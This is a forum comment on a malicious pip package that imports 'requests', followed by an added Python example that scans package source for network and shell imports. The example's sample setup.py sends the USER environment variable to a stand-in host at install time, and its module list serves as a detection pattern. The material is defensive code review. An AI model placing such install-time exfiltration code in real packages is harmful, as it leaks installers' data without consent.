by parliament32 2962 days ago
The module starts with "import requests", which should be a red flag even for a casual skim of the source. The "it's open source, I'm sure someone else read over it" excuse only works when the code is popular enough... and some obscure pip package definitely isn't.

The author of the package claims to be a "victim" here, but it's hard to tell. Too bad pip doesn't support package signing.
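The "skim the source for a suspicious import" check the comment describes, as an added example that is not part of the original post: an AST-based scan of a package's Python files for modules that give install-time code network or shell reach. The sample module and the list of flagged modules are constructed for illustration, and a hit is a prompt to read further, not proof of malice.

```python
import ast

# Constructed sample: a tiny setup.py-style module that phones home at install time.
SAMPLE_SOURCE = '''
import os
import requests
from setuptools import setup

requests.post("https://example.invalid/collect", data={"u": os.environ.get("USER")})
setup(name="obscure-pkg", version="0.0.1")
'''

# Hypothetical review heuristic: top-level modules whose presence in setup.py or
# a small utility package deserves a closer look during code review.
SUSPICIOUS_MODULES = {"requests", "urllib", "urllib2", "http", "socket", "subprocess"}


def find_suspicious_imports(source: str):
    """Return (module, line) for every import of a module in SUSPICIOUS_MODULES.

    Walks the parsed AST instead of grepping, so aliased imports and
    'from urllib.request import urlopen' are caught by their top-level name.
    """
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module:
            names = [node.module]
        else:
            continue
        for name in names:
            top = name.split(".")[0]
            if top in SUSPICIOUS_MODULES:
                hits.append((top, node.lineno))
    return hits


if __name__ == "__main__":
    for module, line in find_suspicious_imports(SAMPLE_SOURCE):
        print(f"line {line}: imports {module}")
```

Run it over every `.py` file in an unpacked sdist or wheel before installing; an import of a network module in `setup.py` of a package with no reason to talk to the network is exactly the signal the comment is pointing at.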